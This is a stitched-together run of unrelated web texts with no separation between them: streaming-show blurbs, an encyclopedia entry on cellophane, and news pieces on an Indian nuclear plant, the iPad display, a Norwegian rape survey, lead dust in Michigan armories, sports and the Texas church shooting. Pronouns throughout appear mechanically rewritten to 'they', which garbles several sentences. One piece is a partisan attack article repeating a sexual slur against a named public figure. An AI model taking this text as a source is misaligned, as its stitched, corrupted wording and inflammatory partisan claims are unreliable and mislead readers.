Guillermo Del Toro Presents 10 After Midnight
Acclaimed Academy Award-winning filmmaker Guillermo del Toro curates this collection of sinister stories, each more horrifying than the next.
Warrior Nun
A young woman wakes up in a morgue with inexplicable powers and gets caught in a battle between good and evil. Inspired by the manga novels.
Tiffany Haddish Stand Up Special
Tiffany Haddish brings their brash, barrier-breaking brand of comedy to Netflix with an exclusive one-hour stand-up special.
The Order
Out to avenge their mother's death, a college student pledges a secret order and lands in a war between werewolves and practitioners of dark magic.
Escape from Hat
A desperate rabbit rallies an unexpected band of allies to help them escape from inside a magician's hat and return to the human boy they love.
Queer Eye: We're in Japan!
The Fab Five bring their message of self-care and compassion to four Japanese men and women while exploring the country's rich culture and cuisine.
Transparent cellophane packaging with gingerbread and a printed cellophane bag with chocolate hearts.
Cellophane is a thin, transparent sheet made of regenerated cellulose. Its low permeability to air, oils, greases, bacteria, and water makes it useful for food packaging.
"Cellophane" is a generic term in some countries, while in other countries it is a registered trademark.
Production [ edit ]
Cellulose from wood, cotton, hemp, or other sources is dissolved in alkali and carbon disulfide to make a solution called viscose, which is then extruded through a slit into a bath of dilute sulfuric acid and sodium sulfate to reconvert the viscose into cellulose. The film is then passed through several more baths, one to remove sulfur, one to bleach the film, and one to add softening materials such as glycerin to prevent the film from becoming brittle.
A similar process, using a hole (a spinneret) instead of a slit, is used to make a fibre called rayon. Chemically, cellophane, rayon and cellulose are polymers of glucose; they differ structurally rather than chemically.
History [ edit ]
Cellophane was invented by Swiss chemist Jacques E. Brandenberger while employed by Blanchisserie et Teinturerie de Thaon.[1] In 1900, inspired by seeing a wine spill on a restaurant's tablecloth, they decided to create a cloth that could repel liquids rather than absorb them. Their first step was to spray a waterproof coating onto fabric, and they opted to try viscose. The resultant coated fabric was far too stiff, but the clear film easily separated from the backing cloth, and they abandoned their original idea as the possibilities of the new material became apparent.
It took ten years for Brandenberger to perfect their film, their chief improvement over earlier work with such films being to add glycerin to soften the material. By 1912 they had constructed a machine to manufacture the film, which they had named Cellophane, from the words cellulose and diaphane ("transparent"). Cellophane was patented that year.[2] The following year, the company Comptoir des Textiles Artificiels (CTA) bought the Thaon firm's interest in Cellophane and established Brandenberger in a new company, La Cellophane SA.[3]
Cellulose is treated with alkali and carbon disulfide to yield viscose.
Cellophane can come in any color and is used in packaging different products in grocery stores.
Whitman's candy company initiated use of cellophane for candy wrapping in the United States in 1912 for their Whitman's Sampler. They remained the largest user of imported cellophane from France until nearly 1924, when DuPont built the first cellophane manufacturing plant in the US. Cellophane saw limited sales in the US at first since while it was waterproof, it was not moisture proof—it held water but was permeable to water vapor. This meant that it was unsuited to package products that required moisture proofing. DuPont hired chemist William Hale Charch, who spent three years developing a nitrocellulose lacquer that, when applied to Cellophane, made it moisture proof.[4] Following the introduction of moisture-proof Cellophane in 1927, the material's sales tripled between 1928 and 1930, and in 1938, Cellophane accounted for 10% of DuPont's sales and 25% of its profits.[3]
Cellophane played a crucial role in developing the self-service retailing of fresh meat, according to Roger Horowitz, who ran a historic study over meat-packing industry. Cellophane visibility helped customers know quality of meat before buying. Cellophane also allowed manufacturers to manipulate the appearance of a product by controlling oxygen and moisture levels to prevent discoloration of food.[5]
The British textile company Courtaulds' viscose technology had allowed it to diversify in 1930 into viscose film, which it named "Viscacelle". However, competition with Cellophane was an obstacle to its sales, and in 1935 it founded British Cellophane Limited (BCL) in conjunction with the Cellophane Company and its French parent company CTA.[6] A major production facility was constructed at Bridgwater, Somerset, England, from 1935 to 1937, employing 3,000 workers. BCL subsequently constructed plants in Cornwall, Ontario (BCL Canada), as an adjunct to the existing Courtaulds viscose rayon plant there (from which it bought the viscose solution (AKA dope)), and in 1957 at Barrow-in-Furness, Cumbria. Those last two plants were closed in the 1990s.
Present day [ edit ]
Cellulose film has been manufactured continuously since the mid-1930s and is still used today. As well as packaging a variety of food items, there are also industrial applications, such as a base for such self-adhesive tapes as Sellotape and Scotch Tape, a semi-permeable membrane in a certain type of battery, as dialysis tubing (Visking tubing), and as a release agent in the manufacture of fibreglass and rubber products. Cellophane is the most popular material for manufacturing cigar packaging; its permeability to moisture makes cellophane the perfect product for this application as cigars must be allowed to "breathe" while in storage.
Cellophane sales have dwindled since the 1960s, due to alternative packaging options. The polluting effects of carbon disulfide and other by-products of the process used to make viscose may have also contributed to this; however, cellophane itself is 100% biodegradable, and that has increased its popularity as a food wrapping.
Material properties [ edit ]
When placed between two plane polarizing filters, cellophane produces prismatic colours due to its birefringent nature. Artists have used this effect to create stained glass-like creations that are kinetic and interactive.
Cellophane is biodegradable, but highly toxic carbon disulfide is used in most cellophane production. Viscose factories vary widely in the amount of CS 2 they expose their workers to, and most give no information about their quantitative safety limits or how well they keep to them.[7][8]
Branding [ edit ]
In the UK and in many other countries, "cellophane" is a registered trademark and the property of Futamura Chemical UK Ltd, based in Wigton, Cumbria, United Kingdom.[9] In the US and some other countries "cellophane" has become genericized, and is often used informally to refer to a wide variety of plastic film products, even those not made of cellulose,[10] such as plastic wrap.
See also [ edit ]
NEW DELHI: The Toshiba will go ahead with the project of setting up of a nuclear plant in Andhra Pradesh despite its partner Westinghouse filing for bankruptcy, the government informed the Rajya Sabha today, allaying fears on this count."Through the informal sources, we have been conveyed that the Toshiba will not back out and will go ahead," Minister of State in-charge of Atomic Energy Jitendra Singh said.He was responding to questions on the status of the Kovvada nuclear reactors.The Minister said the current status is that the precise clarity would ultimately emerge only when Toshiba gives out a formal communication in this regard."But as far as official channels are concerned, we have not received any denial or any reluctance on the part of the US companies to carry forward this project," they said.He said from information gathered, Westinghouse has gone in for an appeal and has also gone in for a bail-out fund amounting to about USD 800 million."There is also a negotiation going on between Toshiba and Westinghouse," they said.He said members have rightly pointed out about concerns that emerges from media reports that have appeared in the last few days, "but, I would just like to state that as far as we are concerned, we have not received any official information as such."The 7200 Mega Watt nuclear plant is being set up with the help of US companies and Toshiba in Andhra Pradesh and the first reactor is likely to be set up by 2022 if work starts on it now.He said this project was in principle planned to be set up in collaboration with the USA and was envisaged to have six units and its first unit was expected to be set up within five years."There were certain issues even at our own level, but I am glad that the Government of Andhra Pradesh has been very supportive."We have been proactive both at the Centre and at the state level, and only last Saturday, on the 25th of this month precisely, the Chief Minister of Andhra Pradesh has cleared the land acquisition file. So, our part is moving very smoothly," they told the Rajya Sabha during Question Hour.
“Are You Into Golden Showers?”: Former Obama Campaign Manager David Axelrod's Son Calls FLOTUS Melania a “Prostitute”
Michael Axelrod, the son of former Obama campaign manager, David Axelrod, took to Twitter Friday to call First Lady Melania Trump a “prostitute.”
“”Are you into golden showers? Do you need citizenship? You said your name was Melania right?” # QuestionsForAProstitute # FridayFeeling,” tweeted Axelrod.
Archived tweet source: Mike Axelrod
A search through David Axelrod “following,” accounts shows he's following @Mike_Axelrod, proving this is indeed their son.
Mike Axelrod's Twitter biography reads, “Except blood, fatherhood, and the Bulls I share nothing with .”
Axelrod's Twitter cover photo includes themselves and their father.
Mike Axelrod's tweet about “golden showers,” is a reference to the discredited Fusion GPS dossier that falsely alleged Trump engaged in the lewd sexual act while in Russia.
As The Gateway Pundit‘s Jim Hoft reported, according to BuzzFeed, CNN and several far left sites—Trump partook in “golden showers” in Russia with prostitutes on a bed Obama once slept on… Russia then blackmailed Trump, not by asking for money or influence in their business deals, but by forcing them to run for president against all odds and win?
Here is the story that the CIA and idiots in the FAKE NEWS Media are pushing on America–
Here's what they want us to believe — Let's recount:
** Obama has a meeting in Russia.
** Trump flies to Russia, finds out the hotel room Obama stayed in, and books it.
** Trump finds at least two hookers and invites them to Obama's former hotel suite.
** Trump instructs the hookers to PISS ON THE BED because they hate Obama so much.
** Little did Trump know Putin had the entire room outfitted with video cameras.
** The Russian government now has video proof of Trump watching hookers PISS on a bed.
** Russian government tells Trump they will release the video if they do not run for president.
** Trump runs for president and against all odds and WINS the White House.
The report included ridiculous snippets like this one – That Trump couldn't get a deal with the Russians so they hired a couple hookers instead.
As The Gateway Pundit reported, the original story was created by 4Chan user… And the intelligence community, John McCain and the far left #FakeNews media fell for the hoax.
As Twitter user @PROUDESTMURICAN pointed out, the Daily Mail settled a lawsuit for $2.9 million after the paper alleged Melania Trump “provided services beyond simply modeling”
Your son, @mike_axelrod better get their head on straight. Calling Melania a prostitute who gets urinated on for money could end up costing them a lot of money. https://t.co/i1MpirX4FT pic.twitter.com/uPQql98mEI — NPCs for Hillary 2020 (@PROUDESTMURICAN) December 29, 2017
Who is Michael Axelrod? According to a 2010 Michigan Avenue Magazine feature…
Michael, 27, is the founder of Grant Park Global, a firm that “assists Chicago-based companies and decision makers in removing access barriers in specific international markets.” […] Still, their heart belongs here. “Chicago is the epitome of an American urban setting— diverse, forward-thinking and warm and welcoming toward everyone.” […] Of course, a life in the spotlight isn't without its drama—like when they found themselves in an off-the-court altercation with the NBA's Antonio Davis at a Bulls-Knicks game. But, much like their spin doctor father, Michael prefers to control the message. “No comment,” they wisely say.
Advertisement
The iPad, the much-anticipated Apple tablet computer announced today, is not going to revolutionize the display industry. It doesn't sport a bright OLED display; it isn't wearing the latest Pixel Qi technology that combines normal transmissive LCD technology with a black-and-white reflective version for easy viewing in bright sunlight.
The iPad simply uses a liquid crystal display backlit with light emitting diodes, the kind of display you see today on many flat screen televisions and computer monitors. The particular type of liquid crystal display—in-plane switching—has two transistors per crystal, one more than standard thin-film transistor LCDs. This kind of display needs a brighter backlight, so has been less common in the laptop area, but has a bigger viewing angle.
Apple's choice to go with LCD technology isn't particularly surprising; the iPad will be used to display photos and videos, and to do that needs a full-color, full-motion display. So e-ink and its monochrome brethren are out. OLED technology, right now, is just too expensive. And Pixel Qi is a compromise; it gives up a bit in color saturation to pick up that visibility in sunlight. Steve Jobs isn't one to compromise.
But the choice of LCD technology means that, in spite of the library of e-books that will be available for the iPad, this device is no e-book reader. While I'm not an e-book convert myself, the folks I know who carry Kindles with them read them outdoors as much as in, often in sunlight; that just won't be possible with this LCD display. And, even indoors, they swear that the reading experience—in particular, the eyestrain—is much different than that on an LCD display
The iPad will, however, impact the world of displays, says Jason Heikenfeld, an associate professor in the Novel Devices Laboratory at the University of Cincinnati, because, with its ability to allow magazines and other publications to be sold with the ease of an iTunes track, it “will increase the movement to digital media.” This will up the demand for a do-it-all display that can display full color motion video as well as easy to read text, and may speed up the advance of the state of the art.
Over at the FX Palo Alto Laboratory (a subsidiary of Fuji Xerox), a group of scientists looking at how best to read and navigate electronic documents on portable devices is also encouraged by the iPad. While the current reading applications don't go beyond the state of the art, says researcher Scott Carter, “the form factor coupled with the screen capabilities should facilitate new media-rich reader applications as well as interactive collection browsing apps” that will make all our lives easier.
In the meantime, I won't be tossing out the pile of books on my nightstand in order to download my bedtime reading from iTunes. It's not a printed book killer—or a Kindle killer. But, to be fair, it doesn't have to be to succeed, it's a sweet computer, certainly more appealing than a netbook—but that's another post.
For more reactions and analysis, visit the iPad topic page.
This woman is unrelated to the story. File photo: Lucy Maude Ellis/Flickr
Nearly one in ten women in Norway have been raped, half of them when they were below the age of 18, according to a new survey.
The survey of 2435 women and 2092 men, carried out by the National Centre for Violence and Traumatic Stress Studies (NKVTS), found that 9.4 percent of women in the country reported having been raped, compared with 1.1 percent of men.
"This is very serious information, and the dark figures presented here are much larger than what we've seen in public statistics," Anders Anundsen, Norway's Justice Minister, told the VG newspaper.
"What concerns me, as well as the scale, is that so few come forward. They decide to keep it to themselves, rather than take advantage of the support system that exists."
According to the survey, 49 percent of the women who reported being raped said that the attack had taken place before they were 18 years old, with the perpetrator most likely to be a known person such as a friend, acquaintance, neighbour, work colleague, boyfriend or ex-boyfriend.
Only eleven percent of those who had been raped reported it or underwent any medical examination, with a third of victims never telling anyone what happened.
In 2012 we made an album entirely dedicated to Swedish history.
We named it after one of the most iconic kings ever to sit on the throne of our country, Karl XII, more known as CAROLUS REX.
Carolus Rex was killed in 1718 at Fredrikstens Fortress in Norway during a siege and 100 years of the Swedish Empire came to an end this dark night in November.
Now, in June 2017 Carolus Rex will return to this legendary fortress for a unique night when we in Sabaton will perform our entire album dedicated to the the rise and fall of the Swedish Empire.
See Carolus rise!
Tickets for this, and all other Sabaton shows, is available here in our tour section!
Historic fact about Carolus Rex:
Charles XII, also known as Carolus Rex, became King of Sweden on 5th April 1697 at the age of 15, following the death of their father Charles X1.
The Great Northern War broke out in February 1700, as neighbouring countries planned to take back territories that they had lost during the swedish expansion of the 1600s. Sweden was attacked on three fronts: by Peter The Great in Russia, Augustus The Strong in Saxony/Poland and Frederick IV in Denmark.
They were all convinced that Sweden, led by an inexperienced teenage King, would be easy prey. However, the young King, by then 18 years of age, quickly lined up several victories.
The quiet but determined King had been brought up to rule as an absolute monarch. Many of their closest officials and high ranking officers found them hard to understand but they were loved by their soldiers. When they attacked, they were often in the first rank.
Charles XII's bravery, quick wits and unusually good tactical eye made them an outstanding leader in pitched battle. Their exceptional ability to infuse courage into their soldiers was another strong contributing factor in the initial triumphs and their army's high morale in battle.
However, they could also appear harsh and callous. A macho culture predominated in their circles, where showing feelings like grief and pain were out of the question.
The Swedish army's treatment of both the civilian population and prisoners of war in Poland and Russia was sometimes extremely cruel.
With the King's consent, there were merciless reprisals – including the torture of children – and mass executions.
Forget the Nordic princesses of Frozen. Moana hails from Polynesia and is all set for a tropical ocean adventure in 2018.
Prepare to go about 2,000 years back in time — way before Europeans like the British navigator Captain James Cook set sail in the South Pacific, looking for new land.
In the upcoming computer-animated film Moana, we'll meet a fiercely brave princess who's able to navigate the ocean by herself. Disney describes the movie as a “mythic adventure set across a series of islands set across the South Pacific.”
Moana is the only daughter of a chief in a long line of navigators and will set off on a marine adventure, calling on the help of demigods and spirits from traditional Polynesian culture.
Though we don't know which mystical deities Moana will summon, some possibilities are Pele, the goddess of volcanoes, their older sister Namaka, the water spirit, and the fire god Lono-makua.
For supporting characters, there's a whole ocean of possibilities. Moana may befriend an orca or another type of dolphin. We'd like to see a singing octopus or even a dancing seahorse. We're betting that at some point, Moana will have a shark encounter, creating high-stakes drama for the young princess. It's possible that Disney could go against stereotype and create a shark character that's not vicious, but rather some type of ally for the princess.
Weather could also play a role in Moana's tale. They could possibly face a tsunami or typhoon; however, it's unlikely she'll face a sharknado.
As for actores to voice Moana, no one's been cast yet, but we'd like to see Q'orianka Kilcher (The New World), Selena Gomez, or even the hilarious Mindy Kaling.
One thing we can be sure of: Disney will no doubt use Moana to promote its Hawaiian resort Aulani, located in Ko Olina, Hawaii.
• Cazorla has been out of action since knee injury in November • Santi is running again but needs three to four more weeks, adds Wenger
Arsenal's Santi Cazorla out for three to four more weeks, says Arsène Wenger
Arsène Wenger has said Santi Cazorla will be out for another three or four weeks as the Arsenal midfielder strives to play again before the end of the season.
Arsenal caught out at the near post by oligarchs and TV billions | Jonathan Wilson Read more
Cazorla has not been involved since they ruptured the lateral collateral ligament in a knee at Norwich City last November and Wenger said on 1 March the Spaniard had suffered a setback in training, having felt a reaction in their achilles. In that interview, Wenger reported Cazorla was suffering from “a little tendinitis in their achilles” and dodged the question of whether the 31-year-old was looking at an April return date. The manager painted a bleak picture when they said Cazorla was “not doing too well”.
It prompted the player to tweet that they were “surprised by the piece of news in the press” and that their rehabilitation was going to plan. “I will be ready on 1 April,” they wrote.
Wenger's latest update, however, has ruled Cazorla out for most of April. “Santi is running again outside so it should be three to four weeks more training‚” they said.
The manager added that Jack Wilshere had finally returned to full training this week and “the first signs are quite good”. Wilshere has not played all season because of a fractured fibula. Tomas Rosicky (thigh) is also back in full training.
Arsenal face Watford at the Emirates on Saturday afternoon and Wenger said Petr Cech, who is coming back from a calf injury, may not be ready to return to competitive action. Meanwhile Aaron Ramsey (thigh), Mathieu Flamini (hamstring) and Alex Oxlade-Chamberlain (knee) are unavailable.
The U.S. government is proposing a sweeping overhaul of the way the nation's financial industry is regulated.
In an effort to deal with the problems highlighted by the current severe credit crisis, the new plan would give major new powers to the Federal Reserve, according to a 22-page executive summary of the proposal obtained Friday by the Associated Press.
The proposal would designate the Fed as the primary regulator of market stability, greatly expanding the central bank's ability to examine not just commercial banks but all segments of the financial services industry.
The administration proposal, which is to be formally unveiled in a speech Monday by Treasury Secretary Henry Paulson, also proposes consolidating the current scheme of bank regulation.
The plan would shut down the Office of Thrift Supervision, which supervises thrift institutions (savings and loan associations), and transfer its functions to the Office of the Comptroller of the Currency, which regulates banks.
The plan would eliminate the distinction between banks and thrift institutions.
The role the Federal Reserve has been playing in efforts to stabilize the financial system after a credit crisis hit last August would be formalized.
The Fed would become the government's "market stability regulator," given sweeping powers to gather information on a wide range of institutions so that Fed Chairman Ben Bernanke and their colleagues could better detect where threats to the system might be hiding.
The proposal is certain to generate intense scrutiny in Congress and within the financial services industry, where past efforts to change how regulation is handled have met with fierce resistance.
'He is on the money'
Sen. Charles Schumer, a Democrat from New York, said that they approved of much that Paulson had included in the administration proposal.
"In broad outlines, we agree with large parts of Secretary Paulson's plan," Schumer, chairperson of the Joint Economic Committee, said in a statement.
"He is on the money when they call for a more unified regulatory structure, although we would prefer a single regulator to the three they propose."
Under Paulson's approach, the Fed would serve as the market stability regulator and there would also be a financial regulator that would focus on financial institutions that operate with government guarantees such as deposit insurance for banks.
The administration plan also proposes a business conduct regulator who would be in charge of overseeing consumer protection issues.
The plan was first reported by the New York Times on its website Friday night.
WYOMING, MI - Shiny new lockers sit in a freshly-painted room that used to be an indoor firing range at the Grand Valley Armory in Wyoming. The storage space for 260 soldiers was installed after years of lead dust buildup at the former firing range was removed earlier this year.
Michigan National Guard's indoor firing ranges closed in 1996, but the mess they left polluted parts of facilities beyond them. Testing in 2014 and 2015 showed lead dust levels above recommended levels, including at the Wyoming armory.
Lead dust was allowed to accumulate in National Guard armories across Michigan for decades, exposing soldiers and the even the public to potentially dangerous lead levels. Officials knew about the high levels of lead dust, records show, but waited at least a year to take action, only after the U.S. National Guard told them to.
"I can't speculate on what decision was made in the past or how long lead has been building up," Michigan National Guard spokesperson Maj. Corissa Barton said. "I don't know. We don't have the people that were here previously to tell us."
Lead dust produced when guns were fired collected inside ranges, allowing unsafe levels to get into armory ventilation systems, hallways, kitchens, drill rooms and areas accessed by the public before the 2016 cleanup, reveal documents obtained by the Oregonian/OregonLive, a sister company to MLive.
The National Guard's 1,800 indoor firing ranges across the United States were supposed to be well-ventilated, cleaned regularly and equipped with air filters to prevent lead from spreading. But people tracked dust outside of the ranges and ventilation systems scattered it to other parts of buildings and outside them, according to inspection records. Records showed, for example, lead dust above recommended levels found on a refrigerator at the Port Huron armory and an ice machine at the Cheboygan armory.
A February 2015 sampling of Grand Valley Armory in Wyoming, near Grand Rapids, showed lead results more than 2,000 times the acceptable concentration of 200 micrograms per square foot for a commercial setting, located at the backstop of the former range. High lead dust levels were found in samples taken from HVAC vents in other rooms, and elsewhere, inspection reports show.
In Dowagiac, 45 miles southwest of Kalamazoo, March 2015 sampling uncovered hazardous lead levels throughout the National Guard armory's drill hall, on the floor, window sills, in the ventilation system and on an exit sign. In the old shooting range, which was cleaned before being converted into a locker room, lead dust was found in light fixtures, the ventilation system, on an I-beam and the floor.
Despite test results showing potentially unsafe lead levels, the building stayed open. The Dowagiac Union High School volleyball team was allowed to hold registration for a summer camp at the armory four months after the inspection, even though the building hadn't been cleaned. Dowagiac Union Athletic Director Brent Nate said they did not recall any conversations with National Guard officials about lead dust.
28 armories targeted
The Michigan National Guard saw hazardous test results from some facilities in 2014. It did not take action, however, until after the U.S. National Guard sent a September 2015 memo instructing armories across the country to check for and remove lead dust in order to meet commercial standards throughout the facilities, and standards of 40 micrograms per square foot in public areas.
After the September 2015 memo, the issue was "taken a little more seriously," Barton said.
"We almost overreacted," they said about the response.
A change in staff in mid-2015 was part of the reason the Michigan National Guard didn't act sooner to address lead testing results, Barton said, and officials can't find records that show how long it knew about the presence of lead dust at potentially unsafe levels.
"The best we can do now is (act) as soon as we can and move forward," they said.
Michigan officials identified 28 armories in need of action and sent out a news release in January 2016 laying out their plans, including temporary armory closures, limiting public access and posting signs. Actions were based on where lead was found, and where community events could be held, Barton said. Staff was kept out of other areas, like the boiler room at Grand Valley Armory, which remained locked for further testing as of Dec. 2.
"You want to take the highest level of mitigation possible to ensure you're not putting anyone at risk until you have a full grasp of what the situation is," they said. "Better to be careful than to let everyone in and put them in harm's way."
The armories identified for immediate action in a January were: Adrian, Albion, Alma, Baraga, Bay City, Big Rapids, Dowagiac, Gladstone, Grand Ledge, Grand Valley, Greenville, Howell, Ishpeming, Kalamazoo, Kingsford, Lansing, Manistee, Marquette, Midland, Montague, Pontiac, Port Huron, Saginaw, Saginaw, Sault Ste. Marie, Sturgis, Taylor, and Washtenaw.
Records showing lead sample amounts have not been made public until now. The Oregonian/OregonLive compiled inspection results comprising more than 23,000 pages of public records from 38 states, including Michigan, in an 18-month investigation.
The Michigan National Guard worked during 2016 on the cleanup.
While most of the lead came from former firing ranges, in some cases, it was left by construction crews, Barton said. In one case, lead dust was found on top of a vending machine and officials don't know how it got there, they said.
Updated housekeeping practices were enough to get rid of the lead at some locations, they said.
'It seemed pretty clean'
Paul Lehto, 70, spent 21 years training as a combat engineer during weekends at the Iron River Armory before retiring in 2006. They estimated the gun range in the basement of the Upper Peninsula facility was closed by the mid-1990s and converted to two rooms, mostly used for storage.
"It seemed pretty clean to us," they said about the time following the range's closure. "We didn't think about it at that time. We just knew the state came in, cleaned it up and turned it into two rooms."
Lehto said they aren't concerned about sampling results from February 2015 that showed lead dust levels as high as 612,727 micrograms per square foot in part of the HVAC system and a report that said, "old ductwork must be removed."
A portion of the HVAC at Iron River had the highest amount of lead dust found in Michigan armories, equal to more than 3,000 times the acceptable amount in a commercial setting.
Barton said they didn't know why Iron River wasn't listed with the other 28 armories needing immediate action, despite lead levels above recommended amounts. They confirmed Dec. 2 that all Michigan armories are now open, though testing continues on some portions of the buildings.
Before it was closed, Lehto said they typically went to the gun range once a year to qualify for the National Guard, though much of their training was outdoors. They said the gun range was also used by the Michigan State Police. They don't remember hearing of anyone with health impacts from lead exposure at the armory, and added that they believe safety is of paramount importance to the Michigan National Guard.
A lead hazard sign is posted on the boiler room door at the Grand Valley Armory on Friday, Dec. 2, 2016 in Wyoming, Mich. (Chelsea Purgahn/Kalamazoo Gazette)
Michigan State University professor Kenneth D. Rosenman, chief of MSU's Division of Occupational and Environmental Medicine, said the hazards of lead-containing dust would depend on the concentration of lead, the amount of time a person was exposed to it, and what they were doing.
"During the active use of a firing range, instructors, frequent users and particularly individuals who do clean up or collect spent bullets develop lead poisoning unless the ventilation is adequate and proper work practices and personal protective equipment is used during cleanup," Rosenman said.
Exposure from bullets is the source of lead for approximately 15 percent of adults whose lead exposure occurs at work and 70 percent of those whose lead exposure occurs in non-work settings in Michigan, they said, citing an annual report examining 2014.
"Certainly dust containing lead is a potential hazard to adults using the armories," Rosenman said.
There are no known complaints and no reported health issues from lead at Michigan armories and the National Guard is confident it has taken "the most aggressive approach in the nation to ensure no one was at risk," Barton said.
The Michigan Department of Environmental Quality Air Quality Division said indoor gun ranges don't need an air permit if they agree to install a proper filtration system.
Extensive cleanup efforts
"It's highly unusual for a gun range to go the permit route," Acting Field Operations Supervisor for the DEQ's Air Quality Division Chris Ethridge said, and most installation filters and avoid the requirement. They did not immediately know specifics about ranges at Michigan armories.
All of the armories are now open after "extensive efforts" to clean up areas accessed by the public, Barton said.
The majority of the Michigan National Guard's full-time soldiers participated in voluntary blood tests in 2016, and all of them came back negative for lead, they said. State workers who do maintenance on the buildings were also offered the testing that yielded no positive results for lead, they said.
There wasn't much of a public health risk, Barton said, and the greatest threat would be someone touching lead and putting it in their or their mouth.
"Other than that, your risk is incredibly small and almost no risk at all," they said.
Michigan Environmental Council Health Policy Director Tina Reynolds said the most common pathways of child lead exposure are lead paint in homes and at playgrounds, but they believe every pathway to potential lead exposure should be looked at.
No amount of lead is good for a child, they said, and a small amount of dust at an armory or tracked home by a parent could expose a child to higher-than-recommended lead levels. Lead poisoning in children could lead to developmental delays, learning difficulties, irritability, vomiting, hearing loss and more, according to the Mayo Clinic.
Barton said the risk of lead being tracked from armories was low, because most of the lead dust was not found on floors.
The Michigan Department of Health and Human Services declined to comment on the issue, saying its Healthy Homes Section only regulates or provides assistance to child-occupied buildings, like homes and day cares.
A renovated distance learning center room, which was once where the military band held practice, at the Grand Valley Armory on Friday, Dec. 2, 2016 in Wyoming, Mich. (Chelsea Purgahn/Kalamazoo Gazette)
The Michigan National Guard's effort to remove lead dust is part of a push to modernize the organization and its facilities, Barton said. Besides the new locker room, the Wyoming facility also recently converted a former band practice room into a classroom, where a pallet of laptops waits to be set up for use as distance education for soldiers.
"We've been at war for 14 years now," Barton said. "Our focus has not been on the armories. Our focus has been on getting our soldiers from overseas back home safe."
Now the organization is taking some time to "reset," they said, to address some things that fell by the wayside before and to make plans for the future, which will include annual testing for lead dust.
The Oregonian/OregonLive contributed to this report.
GREEN BAY, Wis. – Lately, Pete Carroll's “Win Forever'' mantra has also come to mean “Win Even When It Doesn't Technically Matter.”
The Seahawks have won seven straight exhibition games dating to 2011 heading into a contest here at 5 p.m. Friday against the Green Bay Packers.
Carroll seemed surprised when informed of that streak Thursday, and noted that like every team, the Seahawks do little specific preparing for exhibition games. “We don't gameplan but 10 plays a day (this week),” they said.
What matters more, they said, is the approach and manner in which the team plays.
“I don't think you should ever play anything and just kind of show up,” they said.
And if there is a game that tends to matter just a little more in the exhibition season, it is the third one.
Seattle played the starters for two series in the first game against San Diego, and then for essentially the entire first half last week against Denver. The starters figure to get even more action against the Packers in the game that most resembles a dress rehearsal for the regular season (starters will mostly be rested for the final tuneup next week against the Raiders).
That Friday's game also figures to be played in a rather raucous setting akin to the regular season (which was not the case in the rather sleepy environs at San Diego) also makes it a key test for a Seattle team that was just 3-5 on the road (and 1-1 in the playoffs) last season.
“This is a really cool match for us to go on the road to make it an atmosphere much like going on the road the rest of the season,” Carroll said. “We need all that.”
Still, there will also be some specific objectives for the Seahawks.
Offensively, Seattle's starting lineup became pretty well set this week when the team traded John Moffitt to Denver, making J.R. Sweezy the acknowledged starter at right guard.
Offensive coordinator Darrell Bevell this week, however, said he'd like to see the Seahawks do a little better on third downs — Seattle was 4 for 12 against Denver and 2-5 in the first half (Seattle was also 0-1 on fourth downs in the first half).
“Our overall execution was better (than against San Diego),” Bevell said. “But we've got to do it again (against the Packers).”
Seattle's offense, however, will again be a little short-handed as the Seahawks will be without starting receiver Sidney Rice and tight end Zach Miller. Each returned to practice this week after being limited previously with knee and foot injuries, respectively. But Carroll said the team won't rush them into exhibition games, instead preferring them to sit out to get ready for the regular-season opener Sept. 8 at Carolina. Fullback Michael Robinson, who has been sick all week, also will miss the game.
That will again open up opportunities for some of the younger skill players such as receiver Stephen Williams (who leads the team in receiving with four catches for 128 yards) and tight ends Luke Willson and Sean McGrath. Rookie running backs Christine Michael (who returned to practice this week after missing the Denver game with back spasms) and Spencer Ware also could again get significant carries, and with Robinson out, Derrick Coleman may see more time.
Defensively, the Seahawks will continue to try to find some answers at the three-technique tackle position, which continues to be hit with injuries.
Rookie Jesse Williams won't play after sitting out all week with knee issues. Also out is rookie Jordan Hill, who had impressed in the first two games but suffered a strained biceps in practice on Tuesday. Carroll said Hill won't play against the Packers but said a report that they are out 3-6 weeks is “not accurate.”
With the two youngsters out, Tony McDaniel will get the start. McDaniel, who played the last four seasons with Miami, was signed as a free agent in the offseason but has missed the first two games with a groin injury.
Seahawks coach had said this week it was imperative that they begin being able to see what they have in McDaniel, who is in their eighth season overall.
“This is a good opportunity for Tony,'' Carroll said. “He's going to start this game and show us what they can do. … We're counting on them doing some good things.''
Carroll said the status of defensive end Cliff Avril and end/linebacker Bruce Irvin also remained up in the air, which means newly-acquired O'Brien Schofield is again likely to start and that rookie Benson Mayowa could also again see significant time early.
Bob Condotta: 206-515-5699 or bcondotta@seattletimes.com
Latest Updates:
Officials have identified the suspect as a 26-year -old male, reports have named them as Devin Patrick Kelley
26 people were killed, 20 others were injured
Shooter has died.
WATCH: Deadliest mass shooting in Texas history
A gunman opened fire at a Baptist church in Sutherland Springs, Texas on Sunday, killing 26.
The shooter has been identified by officials as Devin Patrick Kelley, reports the New York Times, NBC and others. Officials declined to provide the suspect's name during a press conference, but they did confirm that they were 26.
READ MORE: Texas church shooter identified as Devin Patrick Kelley: reports
A witness told local news outlet KSAT News that they saw a man walk into First Baptist Church on 4th Street at around 11:30 a.m. Witnesses later told a CBS affiliate that they heard several gunshots before realizing that several people were hit during the incident.
Twenty-six people were killed during the attack, officials said during a press conference following the attack. The Connally Memorial Medical Centre later confirmed to reporters that multiple victims are being treated. Officials said during the conference that victims ranged from ages five to 72.
WATCH: A resident of Sutherland Springs, Texas says he's knows several of the people who go to the church and says a friend claims they helped take down the fleeing suspect.
After the suspect entered the church and began firing their rifle, a local resident then grabbed their own rifle and engaged the suspect, officials say. The suspect then fled the church and was pursued by local law enforcement. The suspect then drove off the road near the county line and crashed.
Officials stated that law enforcement found the suspect deceased in the vehicle with a gunshot wound, though it wasn't immediately clear whether the suspect committed suicide or if they were shot by the resident.
Little is known so far about the victims, except that the 14-year-old daughter of the church's pastor Frank Pomeroy was among those killed.
READ MORE: Texas church shooting: Woman avoids massacre after deciding not to attend church
Pomeroy, who was in Oklahoma at the time of the shooting, told reporters that their daughter Annabelle Pomeroy was ” one very beautiful and special child.”
Sherri Pomeroy, wife of Frank Pomeroy, said in a text message to the Associated Press that they lost their daughter “and many friends” in the shooting. The text came to a phone number linked in online records to Frank Pomeroy.
Wilson County Sheriff Joe Tackitt told reporters that there were several injuries and several casualties following the incident, though the numbers are still unconfirmed. It's also been reported that children may have been among those killed.
County Sheriff's Office spokesperson Robert Murphey later told CNN that the shooter was killed after a short chase into Guadalupe County.
Texas Attorney General Ken Paxton said in a statement that their office “stands ready to assist local law enforcement as needed.”
